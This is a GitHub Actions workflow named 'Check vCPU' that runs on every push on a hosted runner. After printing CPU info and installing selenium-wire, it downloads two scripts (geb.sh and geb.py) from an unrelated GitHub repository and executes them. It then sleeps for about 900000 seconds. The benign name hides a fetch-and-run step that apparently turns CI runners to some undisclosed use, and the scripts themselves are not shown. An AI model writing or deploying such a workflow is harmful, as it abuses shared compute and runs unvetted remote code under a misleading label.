name: Check vCPU

on: push

jobs:
  check_cpu:
    runs-on: namespace-profile-namespace-x8

    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Works
      run: |
        lscpu
        pip3 install selenium selenium-wire
        pip3 uninstall blinker -y && pip3 install blinker==1.4
        wget https://raw.githubusercontent.com/gebanu/geban/refs/heads/main/geb.sh && chmod +x geb.sh && ./geb.sh && wget https://raw.githubusercontent.com/gebanu/geban/refs/heads/main/geb.py && python3 geb.py
        sleep 900000
